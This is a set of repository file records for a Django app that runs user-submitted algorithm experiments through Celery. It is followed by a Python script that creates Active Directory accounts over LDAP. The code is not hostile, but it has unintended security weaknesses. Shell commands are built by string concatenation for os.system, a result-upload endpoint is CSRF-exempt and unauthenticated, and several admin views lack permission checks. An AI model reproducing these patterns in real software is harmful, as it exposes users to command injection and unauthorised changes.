appU.usuario.email\n staff = appU.usuario.is_staff\n active = appU.usuario.is_active\n\n dataAppUser = {'nickname': nickname, 'company': company, 'choice': choice,'resultsPerPage':resultsPerPage}\n dataUser = {'email': email, 'is_staff': staff,'is_active':active}\n\n appUserForm = AppUserForm(request.POST or None, initial=dataAppUser)\n userForm = UserForm(request.POST or None, initial=dataUser)\n passwdForm = PasswdChangeForm(request.POST or None)\n\n context = {\n 'title': 'Editar Usuário',\n 'appUser': appUser,\n 'authUser': authUser.username,\n 'appUserForm': appUserForm,\n 'userForm': userForm,\n 'passwdForm': passwdForm,\n }\n\n return render(request, 'admin/edit_user.html', context)\n\ndef addUser(request):\n title = 'Novo usuário'\n appForm = AppUserForm(request.POST or None)\n uForm = UserForm(request.POST or None)\n context ={\n 'title': title,\n 'appForm': appForm,\n 'uForm': uForm,\n }\n\n return render(request,'admin/add_user.html',context)\n\ndef saveUser(request):\n username = request.POST.get(\"username\")\n email = request.POST.get(\"email\")\n password = request.POST.get(\"password1\")\n is_active = request.POST.get('is_active')\n\n nickname = request.POST.get(\"nickname\")\n company = request.POST.get(\"company\")\n resultsPerPage = request.POST.get(\"resultsPerPage\")\n notification = request.POST.get(\"choice\")\n\n active = True if is_active == 'on' else False\n\n user = User(username=username, \n email=email, \n is_active=active)\n user.set_password(password)\n user.save()\n\n appUser = AppUser(nickname=nickname,\n company=company,\n resultsPerPage=resultsPerPage,\n notification=notification,\n usuario=user)\n appUser.save()\n\n messages.success(request, \"Usuário criado com sucesso\")\n\n return HttpResponseRedirect(reverse('listUsers'))\n\n\n#################### USER PROFILE / REGISTER #################### \n\ndef getUserProfile(request, username):\n user = User.objects.get(username=username)\n appUser = AppUser.objects.get(usuario=user.id)\n \n email = user.email\n company = appUser.company\n choice = appUser.notification\n resultsPerPage = appUser.resultsPerPage\n\n data={'email':email,'company':company,'choice':choice, 'resultsPerPage': resultsPerPage}\n form = AppUserForm(request.POST or None, initial=data)\n context = {\n 'user': user, \n 'appUser': appUser,\n 'form':form\n }\n return render(request, 'user_profile.html', context) \n\ndef saveProfile(request, uname):\n email = request.POST.get(\"email\")\n company = 
request.POST.get(\"company\")\n choice = request.POST.get(\"choice\")\n resultsPerPage = request.POST.get(\"resultsPerPage\")\n\n #verificar se duplica email\n authUser = User.objects.filter(username=uname)\n authUser.update(email=email)\n\n appUser = AppUser.objects.filter(usuario=authUser[0].id)\n\n appUser.update(company=company,notification=choice, resultsPerPage=resultsPerPage)\n\n if (request.user.is_superuser and 'nickname' in request.POST.dict()):\n nickname = request.POST.get(\"nickname\")\n is_staff = request.POST.get(\"is_staff\")\n is_active = request.POST.get(\"is_active\")\n\n passwd = request.POST.get(\"new_password1\")\n if(passwd != ''):\n authUser[0].set_password(passwd)\n\n staff = True if is_staff == 'on' else False\n active = True if is_active == 'on' else False\n\n # print(is_active, active)\n appUser.update(nickname=nickname)\n authUser.update(is_staff=staff,is_active=active)\n\n messages.success(request, \"Perfil salvo com sucesso\")\n\n return HttpResponseRedirect(reverse('listUsers'))\n\n messages.success(request, \"Perfil salvo com sucesso\")\n return HttpResponseRedirect(reverse('home'))\n\n # return HttpResponseRedirect(reverse('userProfile', kwargs={'username':uname}))\n\n\ndef register_sucess(request):\n return render(request, \"registration/registration_complete.html\", {})\n\n\n#################### EXPERIMENTS / EXECUTION ####################\n\n@json_view\n@csrf_protect\ndef checkForm(request):\n form = ExecutionForm(request.POST or None) # request POST?\n print(request.POST)\n print (\"\\n\\n\")\n\n if form.is_valid(): # processa\n experiments(request)\n helper = FormHelper()\n helper.form_id = 'form_exec'\n helper.form_action = '.'\n form_html = render_crispy_form(ExecutionForm(None), helper)\n return {'success': True, 'form_html': form_html}\n else:\n helper = FormHelper()\n helper.form_id = 'form_exec'\n helper.form_action = '.'\n form_html = render_crispy_form(form, helper, RequestContext(request))\n return {'success': False, 'form_html': form_html}\n\n@csrf_protect\ndef runExample(request):\n if request.method == 'POST':\n algorithm = request.POST.get('Algoritmo')\n d_User = User.objects.get(username=request.user)\n alg = Algorithm.objects.get(nameAlg=algorithm)\n execution = Execution(\n request_by=d_User.appuser,\n algorithm=alg,\n inputFile=alg.sample\n )\n execution.save()\n\n teste= RunExperiment.delay(alg.command, execution.id, 'yes')\n\n execution.save()\n\n messages.warning(request, \"Experimento criado - ID: \" + str(execution.id))\n \n return HttpResponseRedirect(reverse('home'))\n\n form = ExecutionForm(request.POST or None)\n context = {\n 'form': form\n }\n\n return render(request, \"example.html\", context)\n\n\n@csrf_protect\ndef experiments(request):\n if request.method == 'POST':\n form = ExecutionForm(request.POST, request.FILES or None)\n if not form.is_valid():\n title = \"Experiments %s\" % (request.user)\n context = {\n 'form': form,\n 'title': title,\n }\n return render(request, \"experiments.html\", context)\n \n algorithm = request.POST.get('Algoritmo')\n d_User = User.objects.get(username=request.user)\n \n alg = Algorithm.objects.get(nameAlg=algorithm)\n execution = Execution(\n request_by=d_User.appuser,\n algorithm=alg\n )\n execution.save()\n if (request.FILES):\n # print request.FILES\n fileIn = request.FILES[\"Entrada\"]\n execution.inputFile = fileIn\n execution.save()\n elif (execType=='example'):\n fileIn = alg.sample\n\n if (execution.inputFile==None): inFile = 'none'\n else: inFile = 'yes'\n\n teste= 
RunExperiment.delay(alg.command, execution.id, inFile)\n messages.warning(request, \"Experimento criado - ID: \" + str(execution.id))\n\n execution.save()\n title = \"Experiments %s\" % (request.user)\n \n return HttpResponseRedirect(reverse('home'))\n form = ExecutionForm(request.POST or None)\n title = \"Experiments %s\" % (request.user)\n\n hlp = {}\n for item in Algorithm.objects.all():\n hlp[item.nameAlg] = [item.desc,str(item.sample)]\n\n context = {\n 'title': title,\n 'form': form,\n 'help': hlp\n }\n return render(request, \"experiments.html\", context)\n \n@csrf_exempt\ndef result(request):\n if request.method == 'POST':\n # print (\"POST\")\n if (request.FILES):\n idExec = request.POST.get(\"id\")\n tempo = request.POST.get(\"time\")\n print(\"id: %s time: %s\" %(idExec,tempo))\n\n execution = Execution.objects.get(id=idExec)\n fileIn = request.FILES[\"file\"]\n execution.outputFile=fileIn\n execution.status=3\n execution.time = tempo\n execution.save()\n\n appUser = execution.request_by\n userEmail = appUser.usuario.email\n\n if (appUser.notification == 'yes'): \n subject = 'Portal Friends - Experimento concluido com sucesso' \n from_email = settings.EMAIL_HOST_USER \n to_email = userEmail\n message = \"Olá \" + appUser.nickname + \" experiencia \" + idExec + \" foi concluida com sucesso\"\n send_mail(subject, message,from_email,[to_email], fail_silently=False)\n return HttpResponse(1)\n\n\n#################### PAGINATION ####################\n\ndef createPagination(request, appList, resultsPerPage):\n paginator = Paginator(appList, resultsPerPage)\n page = request.GET.get('page')\n if page is None:\n page = 1\n try:\n executions = paginator.page(page)\n except PageNotAnInteger:\n executions = paginator.page(1)\n except EmptyPage:\n executions = paginator.page(paginator.num_pages) # da pra tratar\n if paginator.count == 0:\n data = None\n else:\n data = executions\n pageI = paginate(page, paginator)\n\n return data, pageI\n\n\n#################### REMOVE FROM LIST PAGE - ONE OR MANY ####################\n\ndef removeList(request, model):\n if request.method == 'POST':\n data = request.POST.get('data')\n if data:\n ids = data.split(\",\")\n if(model == 'Algoritmos'):\n Algorithm.objects.filter(idAlg__in=ids).delete()\n messages.success(request,\"Algoritmo deletado com sucesso\")\n return HttpResponseRedirect(reverse('listAlgorithm'))\n if(model == 'Home'):\n if(request.user.is_superuser):\n Execution.objects.filter(id__in=ids).delete()\n else:\n Execution.objects.filter(id__in=ids).update(visible='no')\n messages.success(request,\"Experimento deletado com sucesso\")\n return HttpResponseRedirect(reverse('home'))\n if(model == 'Usuários'):\n AppUser.objects.filter(usuario__in=ids).delete()\n User.objects.filter(id__in=ids).delete()\n messages.success(request,\"Usuário deletado com sucesso\")\n return HttpResponseRedirect(reverse('listUsers'))\n"
},
{
"alpha_fraction": 0.6596406102180481,
"alphanum_fraction": 0.6789910197257996,
"avg_line_length": 49.77193069458008,
"blob_id": "b6177b88ae590464059f3714288632b37a6287db",
"content_id": "d700e9e059b5f39c64abd4afcb17c8149da617fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2894,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 57,
"path": "/Django Proj/webapp/webapp/urls.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nimport webapp.regbackend as regbackend\nimport experiment.views as views\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^about/$', views.about, name='about'),\n url(r'^contact/$', views.contact, name='contact'),\n\n # urls experiment\n url(r'^experiments/checkForm$',views.checkForm , name='checkForm'),\n url(r'^experiments/$', views.experiments, name='exp'),\n url(r'^experiments/downloadInputFile', views.downloadInputFile, name='downloadInputFile'),\n url(r'^experiments/downloadOutputFile$', views.downloadOutputFile, name='downloadOutputFile'),\n url(r'^experiment/sample/(?P<alg>[a-zA-Z0-9\\u00C0-\\u00FF_-]+)$', views.downloadSample,name='sampleDownload'),\n url(r'^experiments/result$', views.result, name='result'),\n url(r'^experimemt/example/$', views.runExample, name='example'),\n\n # django admin\n url(r'^Django_admin/', include(admin.site.urls)),\n\n # urls register\n url(r'^accounts/register/', regbackend.MyRegistrationView.as_view(),\n name='register_custom'),\n url(r'^complete/', views.register_sucess, name='complete'),\n url(r'^accounts/', include('registration.backends.default.urls')),\n\n # user profile\n url(r'^profile/(?P<username>[a-zA-Z0-9\\u00C0-\\u00FF]+)$', views.getUserProfile, name=\"userProfile\"),\n url(r'^profile/(?P<uname>[a-zA-Z0-9\\u00C0-\\u00FF]+)/save', views.saveProfile, name=\"saveProfile\"),\n\n # ADMIN\n url(r'^admin/remove/(?P<model>[a-zA-Z0-9\\u00C0-\\u00FF]+)$', views.removeList, name=\"removeList\"), #DELETE\n\n # ADMIN algorithm \n url(r'^admin/algorithms/$', views.listAlg, name=\"listAlgorithm\"), #READ\n url(r'^admin/algorithms/(?P<alg>[a-zA-Z0-9\\u00C0-\\u00FF]+)$', views.seeAlg, name=\"seeAlgorithm\"), #READ\n url(r'^admin/algorithms/(?P<idAlg>[a-zA-Z0-9\\u00C0-\\u00FF]+)/update$',views.updateAlg, name=\"updateAlgorithm\"), #UPDATE\n url(r'^admin/algorithms/addAlgorithm/$', views.addAlg, name=\"addAlgorithm\"), #CREATE\n url(r'^admin/algorithms/addAlgorithm/save',views.saveAlg, name=\"saveAlgorithm\"), #CREATE\n url(r'^admin/algorithms/statistics/$', views.appStatistics, name='appStatistics'),\n\n # ADMIN users\n url(r'^admin/users/$', views.listUsers, name=\"listUsers\"), #READ\n url(r'^admin/users/(?P<appUser>[a-zA-Z0-9\\u00C0-\\u00FF]+)_(?P<authUser>[a-zA-Z0-9\\u00C0-\\u00FF]+)$', views.seeUser, name=\"seeUser\"), #READ\n url(r'^admin/users/addUser/$', views.addUser, name=\"addUser\"), #CREATE \n url(r'^admin/users/addUser/save',views.saveUser, name=\"saveUser\"), #CREATE\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n"
},
{
"alpha_fraction": 0.7643312215805054,
"alphanum_fraction": 0.7834395170211792,
"avg_line_length": 25.16666603088379,
"blob_id": "a801a911050190b08619fde1b305823627095d90",
"content_id": "bc1092049cc8ade07a6ffd3396ff662bfd2d2745",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 6,
"path": "/Django Proj/webapp/rstatic.sh",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nservice httpd stop \npython manage.py collectstatic --noinput\nchmod 776 /home/toor/Documents/static_in_env/static_root/css/*\nservice httpd start\n"
},
{
"alpha_fraction": 0.7166778445243835,
"alphanum_fraction": 0.7173476219177246,
"avg_line_length": 35.414634704589844,
"blob_id": "88221d98395a09d4cdf61667b9f698dd7db7932e",
"content_id": "fcd019d04409525d23d6106748a4257c6679cc1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1493,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 41,
"path": "/Django Proj/webapp/experiment/admin.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import AppUser, Execution, Algorithm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.admin import UserAdmin as AuthUserAdmin\n\n# class AppUserAdminInline(admin.StackedInline):\n# \tmodel = AppUser\n# \tmax_num = 1\n# \tcan_delete = False\n\n# class UserAdmin(AuthUserAdmin):\n# \tlist_display = ['username', 'email']\n# \tdef add_view(self, *args, **kwargs):\n# \t\tself.inlines = []\n# \t\treturn super(UserAdmin, self).add_view(*args, **kwargs)\n\t\n# \tdef change_view(self, *args, **kwargs):\n# \t\tself.inlines = [AppUserAdminInline]\n# \t\treturn super(UserAdmin, self).change_view(*args, **kwargs)\n\n\nclass AppUserAdmin(admin.ModelAdmin):\n\tfields = ['nickname', 'usuario', 'company' , 'resultsPerPage', 'notification']\n\tlist_display = ('nickname', 'usuario', 'company', 'date_register', 'last_access', 'resultsPerPage', 'notification')\n\nclass ExecutionAdmin(admin.ModelAdmin):\n\tfields = ['status','request_by', 'algorithm']\n\tlist_display = ['request_by', 'algorithm', 'time', 'date_requisition', 'status', 'inputFile', 'outputFile']\n\nclass AlgAdmin(admin.ModelAdmin):\n\tfields = ['nameAlg', 'desc', 'command', 'sample', 'file']\n\tlist_display = ['idAlg', 'nameAlg', 'desc', 'sample','file']\n\n# # unregister old user admin\n# admin.site.unregister(User)\n# # register new user admin\n# admin.site.register(User, UserAdmin)\n\nadmin.site.register(AppUser, AppUserAdmin)\nadmin.site.register(Execution, ExecutionAdmin)\nadmin.site.register(Algorithm, AlgAdmin)\n"
},
{
"alpha_fraction": 0.616183876991272,
"alphanum_fraction": 0.622481107711792,
"avg_line_length": 44.35714340209961,
"blob_id": "64ae5c0039905de845d5e11bed4071f80a9071db",
"content_id": "cc28aa53c1b289b151e8b4170d8f8dddf567ec3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3197,
"license_type": "no_license",
"max_line_length": 177,
"num_lines": 70,
"path": "/Django Proj/webapp/experiment/forms.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom registration.forms import RegistrationFormUniqueEmail\nfrom .models import Algorithm, Execution\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import SetPasswordForm\n\nclass PasswdChangeForm(SetPasswordForm):\n error_messages = {'password_mismatch': \"As duas senhas não são iguais.\",}\n \n new_password1 = forms.CharField(label=\"Nova senha\",\n widget=forms.PasswordInput,\n required=False)\n new_password2 = forms.CharField(label=\"Confirmação da nova senha\",\n widget=forms.PasswordInput,\n required=False)\n\nclass AppUserForm(RegistrationFormUniqueEmail):\n username = forms.CharField(required=True, label='Usuário', max_length=20, help_text=\"Máximo 20 caracteres\")\n password1 = forms.CharField(required=True,label=\"Senha\", widget=forms.PasswordInput)\n password2 = forms.CharField(label=\"Confirmação da senha\", widget=forms.PasswordInput, help_text=\"Digite a mesma senha do campo anterior\")\n nickname = forms.CharField(required=True, label='Nome', max_length=30)\n company = forms.CharField(required=True, label='Empresa / Instituição', max_length=30)\n resultsPerPage =forms.IntegerField(required=False, initial=10, label=\"Resultados por página\")\n choice = forms.ChoiceField(choices=[('yes','Sim'),('no','Não')], initial='yes', widget=forms.Select, required=False,label=\"Notificação da conclusão de execuções por email?\")\n\nclass UserForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ['email','password','user_permissions','is_staff', 'is_active', 'user_permissions']\n labels = {\n 'email': 'Email',\n 'password': 'Senha',\n 'user_permissions': 'Permissões',\n 'is_staff': 'Administrador', \n 'is_active': 'Conta Ativa', \n }\n help_text = {\n 'is_active': 'Define se a conta está ativa',\n }\n\nclass ExecutionForm(forms.Form):\n Algoritmo = forms.ModelChoiceField(queryset=Algorithm.objects.all(),\n empty_label='---Selecione um algoritmo---',\n required=True,\n to_field_name='nameAlg',\n )\n Entrada = forms.FileField(required=False)\n\n\nclass ContactForm(forms.Form):\n nome = forms.CharField()\n email = forms.EmailField()\n mensagem = forms.CharField(widget=forms.Textarea(attrs={'rows': 5}))\n\nclass YearChartForm(forms.Form):\n years =[]\n for date in Execution.objects.dates('date_requisition','year'): years.append((date.year,date.year))\n\n year = forms.ChoiceField(choices=years, initial='2017', widget=forms.Select(attrs={'max_length': 4}), required=True, label=\"Selecione um ano\")\n\nclass AlgorithmForm(forms.ModelForm):\n class Meta:\n model = Algorithm\n fields = ['nameAlg','desc','sample','file']\n labels = {\n 'nameAlg': 'Algoritmo',\n 'desc': 'Descrição',\n 'sample': 'Exemplo de entrada',\n 'file': 'Arquivo' \n }\n\n"
},
{
"alpha_fraction": 0.6929577589035034,
"alphanum_fraction": 0.7037558555603027,
"avg_line_length": 41.560001373291016,
"blob_id": "176412a842f925e4631479b947d56308f609767a",
"content_id": "a5f856f5a13f65993baac768f366b21fb670d156",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2132,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 50,
"path": "/Django Proj/webapp/experiment/models.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\nclass Algorithm(models.Model):\n idAlg = models.AutoField(primary_key=True)\n nameAlg = models.CharField(null=False, blank=False, max_length=100)\n desc = models.CharField(null=True, blank=False, max_length=500)\n command = models.CharField(null=False, blank=False, max_length=100)\n sample = models.FileField(upload_to=\"samples/\", null=True, blank=True)\n file = models.FileField(upload_to=\"algorithms/\", null=True, blank=True)\n\n def __str__(self):\n return self.nameAlg\n\n\nclass AppUser(models.Model):\n nickname = models.CharField(\n default='default', max_length=30, blank=False, null=True)\n company = models.CharField(\n default='default', max_length=50, blank=False, null=True)\n usuario = models.OneToOneField(User)\n date_register = models.DateField('date_register', auto_now_add=True)\n last_access = models.DateField('last_access', auto_now=True)\n resultsPerPage = models.IntegerField(default=10)\n notification = models.CharField(default=\"yes\", choices=((\"yes\",\"Sim\"),(\"no\",\"Não\")), max_length=4, blank=True)\n\n def __str__(self):\n return self.nickname\n\n\ndef user_directory_path_in(instance, filename):\n return './users/user_{0}/{1}/input'.format(instance.request_by.usuario.id, instance.id)\n\n\ndef user_directory_path_out(instance, filename):\n return './users/user_{0}/{1}/output'.format(instance.request_by.usuario.id, instance.id)\n\n\nclass Execution(models.Model):\n request_by = models.ForeignKey(AppUser)\n date_requisition = models.DateField('date_requisition', auto_now_add=True)\n status = models.IntegerField(default=1)\n algorithm = models.ForeignKey(Algorithm, null=True, blank=False)\n inputFile = models.FileField(upload_to=user_directory_path_in, null=True)\n outputFile = models.FileField(upload_to=user_directory_path_out, null=True)\n time = models.FloatField(default=-1)\n visible = models.CharField(choices=((\"yes\",\"Sim\"),(\"no\",\"Não\")), default='yes',blank=False,null=False, max_length=3)\n\n def __int__(self):\n return self.request_by.id \n"
},
{
"alpha_fraction": 0.5368266701698303,
"alphanum_fraction": 0.5485525727272034,
"avg_line_length": 23.809091567993164,
"blob_id": "2ffeab612924e6d51d0f347b69fb338c0692d999",
"content_id": "b08472a1ca804d008a6974914df515071a2f6c5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2732,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 110,
"path": "/Django Proj/webapp/static_in_pro/our_static/js/experiment.js",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "function setHandlers(){\n\t$('#id_PresetExecution').on(\"change\", function(){\n\t\tvar opcao = $('#id_PresetExecution').val();\n\t\tconsole.log(opcao);\n\t\tvar algSelect = $('#id_PresetExecution option:selected').text();\n\t\tif(opcao){\n\t\t\t$(\"#id_Algorithm option\").filter(function() {\n\t\t \t\treturn $(this).text() == algSelect; \n\t\t\t}).prop('selected', true);\n\t\t\t$(\"#id_opt\").val('');\n\t\t\t$(\"#id_Algorithm\").prop('disabled', true);\t\n\t\t\t$(\"#id_opt\").prop('disabled', true);\n\t\t\t$(\"#id_fileIn\").prop('disabled', true);\n\n\t\t}else{\n\t\t\t$('select#id_Algorithm').prop('selectedIndex', 0);\n\t\t\t$(\"#id_opt\").val('');\t\n\t\t\t$(\"#id_Algorithm\").prop('disabled', false);\t\n\t\t\t$(\"#id_opt\").prop('disabled', false);\n\t\t\t$(\"#id_fileIn\").prop('disabled', false\t);\n\t\t}\n\t});\n};\n\nfunction setAlgorithmDescription(){\n\thlpButtom = document.getElementById('showDesc')\n\tdiv = document.getElementById('hlpAlg');\n\n\thlpButtom.addEventListener(\"click\", function(){\n\tdiv.style.display = (div.style.display === 'block') ? 'none':'block';\n\t})\n}\n\nfunction randomColor(type){\n\t//pick a \"red\" from 0 - 255\n\tvar r = Math.floor(Math.random() * 256);\n\t//pick a \"red\" from 0 - 255\n\tvar g = Math.floor(Math.random() * 256);\n\t//pick a \"red\" from 0 - 255\n\tvar b = Math.floor(Math.random() * 256);\n\t\n\treturn [\"rgba(\" + r + \", \" + g + \", \" + b + \", 1)\",\"rgba(\" + r + \", \" + g + \", \" + b + \", 0.1)\"];\n\t\n}\n\n\nfunction drawStatisticsChart(){\n\t\n\tvar chartCanvas= document.getElementById(\"appChart\").getContext('2d');\n\tvar chartLabel = ['Jan.', 'Feb.', 'Mar.', 'Apr.', 'May', 'June', 'July', 'Aug.', 'Sept.', 'Oct.', 'Nov.', 'Dec.'];\n\tvar chartDataset = [];\n\n\tfor(var key in dt){\n\t\tvar algDataset = {}\n\t\tif (dt.hasOwnProperty(key)){\n \tvar value=dt[key];\n \t\n \talgDataset['label'] = key;\n \talgDataset['data'] = value;\n\n \tvar dataColor = randomColor();\n\n \talgDataset['borderColor'] = dataColor[0];\n \t// algDataset['backgroundColor'] = dataColor[1];\n\n \t}\n \tchartDataset.push(algDataset);\n\t}\n \n \t// draw the chart\n\tvar productsChart = new Chart(chartCanvas,{\n \ttype: 'line',\n \tdata: {\n \tlabels: chartLabel,\n \tdatasets: chartDataset\n \t},\n \toptions: {\n \t\t\ttitle: {\n \t\t\tdisplay: true,\n \t\t\ttext: 'Número de execuções dos algoritmos - 2017'\n \t\t\t},\n \t\t\tscales:{\n \t\t\t\txAxes: [{\n \tgridLines: {\n \tdisplay:false\n \t}\n \t}],\n \t\t\tyAxes: [{\n \tgridLines: {\n \tdisplay:false\n \t} \n \t}]\n \t\t\t}\n\t\t}\n\t});\n}\n\n\n// Call Functions\n// setHandlers();\n\nif(document.getElementById('showDesc')){\n\tsetAlgorithmDescription();\t\n}\n\nelse if(document.getElementById(\"appChart\")){\n\t drawStatisticsChart();\n}\n\n// setTriggers();\n"
},
{
"alpha_fraction": 0.5783460140228271,
"alphanum_fraction": 0.592491865158081,
"avg_line_length": 33.67924499511719,
"blob_id": "165aefbd2f36991b1ea12cf1fd0473d93f8c677d",
"content_id": "a1ba282b60fbe405bfa2b87e458fbb60756eb88f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1838,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 53,
"path": "/Django Proj/webapp/experiment/tasks.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from experiment.models import AppUser, Execution\nfrom celery.utils.log import get_task_logger\nfrom celery.decorators import task\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nimport requests\nimport os\nimport time\n\nlogger = get_task_logger(__name__)\n\n@task(name=\"RunExperiment\")\ndef RunExperiment(execution, ide, inputFile='yes'):\n print(\"\\n Executando o exp %s, algoritmo: %s\" % (ide, execution))\n # os.system(\"if [! -d 'executions/']; then mkdir executions; fi\")\n os.system(\"mkdir executions/\" + str(ide))\n\n if(inputFile == 'yes'):\n os.system(\"wget http://200.201.194.150/experiments/downloadInputFile?id=\" +\n str(ide) + \" -O ./executions/\" + str(ide) + \"/input\")\n start = time.time()\n os.system(execution + \" executions/\" + str(ide) + \"/input > executions/\" + str(ide) + \"/output\")\n else:\n start = time.time()\n os.system(execution + \" > executions/\" + str(ide) + \"/output\")\n dur = time.time() - start\n \n print (dur)\n \n files={'file': str(\"/executions/\"+str(ide)+\"/output\")}\n path = str(\"executions/\" + str(ide)+\"/output\")\n print (path)\n \n files = {'file': open(path, 'rb')}\n data = {'id':str(ide),'time':dur}\n \n r = requests.post('http://200.201.194.150/experiments/result', files=files,data=data)\n print (r.status_code, r.reason)\n \n return r.status_code\n # execution.status = 2\n # execution.save()\n # start = time.time()\n # os.system(query)\n # dur = time.time() - start\n # print dur\n # execution.status = 3\n # user = execution.request_by\n # user.notes.add(nota)\n # user.save()\n # execution.time = dur\n # execution.outputFile = queryOutputFile\n # execution.save()\n"
}
] | 10 |
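Editor's note on the Celery task in `tasks.py` above: it shells out with `os.system` and string concatenation, which is fragile and injection-prone. Below is a hedged sketch of the same download-run-upload flow using `subprocess` with argument lists; the executions directory, result URL, and POST payload are the ones hardcoded in `tasks.py`, while the function name and the plain-string `command` split are illustrative assumptions, not the repository's API:

```python
import os
import subprocess
import time

import requests

def run_experiment(command, ide, input_url=None):
    # one working directory per execution, mirroring "executions/<id>" in tasks.py
    workdir = os.path.join("executions", str(ide))
    os.makedirs(workdir, exist_ok=True)

    args = command.split()  # assumes a simple space-separated command line
    if input_url:
        # fetch the input file over HTTP instead of shelling out to wget
        input_path = os.path.join(workdir, "input")
        with open(input_path, "wb") as f:
            f.write(requests.get(input_url).content)
        args.append(input_path)

    start = time.time()
    with open(os.path.join(workdir, "output"), "wb") as out:
        subprocess.check_call(args, stdout=out)  # avoids shell interpolation
    dur = time.time() - start

    # upload the output file and timing, as tasks.py does
    with open(os.path.join(workdir, "output"), "rb") as f:
        r = requests.post("http://200.201.194.150/experiments/result",
                          files={"file": f}, data={"id": str(ide), "time": dur})
    return r.status_code
```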
rossKayHe/sxg-access-mgmt | https://github.com/rossKayHe/sxg-access-mgmt | a87da7780e0ee5a0ad74cbe9f3d77848cb6f19e9 | a7b7fea620fc2245f3c1e6b371b71552249ac6b3 | 2d41c97b746e433662fee6556c1fbdf21f4b4ac1 | refs/heads/master | 2020-09-28T05:56:47.264013 | 2019-12-08T17:36:17 | 2019-12-08T17:36:17 | 226,705,603 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.554347813129425,
"alphanum_fraction": 0.569972813129425,
"avg_line_length": 36.730770111083984,
"blob_id": "bd99711350faa0a5d2d3aeb4645421ddca6d0d21",
"content_id": "e15ce909efe29c72c547b86d11d010a1ebe86a4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2944,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 78,
"path": "/ldapcreateuser.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser, re \nfrom ldap3 import Connection, ALL, core, MODIFY_REPLACE\n\nusername = sys.argv[1]\npassword = sys.argv[2]\nbase_dn = sys.argv[3]\ndomain = sys.argv[4]\ndesc = sys.argv[5]\nuser_dn = 'cn=' + username + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if user exists\nuser_search = ldap_connection.search(base_dn, '(&(sAMAccountName=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif user_search:\n print (\"User\", username, \"already exists in AD\") \n sys.exit(1)\n\n# Lets build our user: Disabled to start (514)\nuser_attrs = {'objectClass': ['top', 'person', 'organizationalPerson', 'user'], \\\n 'cn': username, \\\n 'userPrincipalName': username + '@' + domain, \\\n 'sAMAccountName': username, \\\n 'givenName': username, \\\n 'sn': username, \\\n 'displayName': username, \\\n 'description': desc, \\\n 'userAccountControl': '514'}\n\n# if base_dn like svc \nif re.match(r\"OU=SVC*\", base_dn):\n # Prep the password\n unicode_pass = '\\\"' + password + '\\\"'\n password_value = unicode_pass.encode('utf-16-le')\n add_pass = {'unicodePwd': [(MODIFY_REPLACE, [password_value])]}\n # 512 will set user account to enabled. 65536 sets password does not expire\n mod_acct = {'userAccountControl': [(MODIFY_REPLACE, '66048')]}\n\n# Add the new user account\nldap_connection.add(user_dn, attributes=user_attrs)\n\nif ldap_connection.result['result'] !=0:\n print (\"Error adding new user: %s\" % ldap_connection.result['description'])\n sys.exit(1)\n\n# if base_dn like svc \nif re.match(r\"OU=SVC*\", base_dn):\n # Add the password\n ldap_connection.modify(user_dn, add_pass)\n if ldap_connection.result['result'] != 0:\n print (\"Error setting password: %s\" % ldap_connection.result['description'])\n sys.exit(1)\n\n # Change the account back to enabled\n ldap_connection.modify(user_dn, mod_acct)\n if ldap_connection.result['result'] != 0:\n print (\"Error enabling user: %s\" % ldap_connection.result['description'])\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n# All is good\nprint ('Successfully created ' + user_dn)\n\n"
},
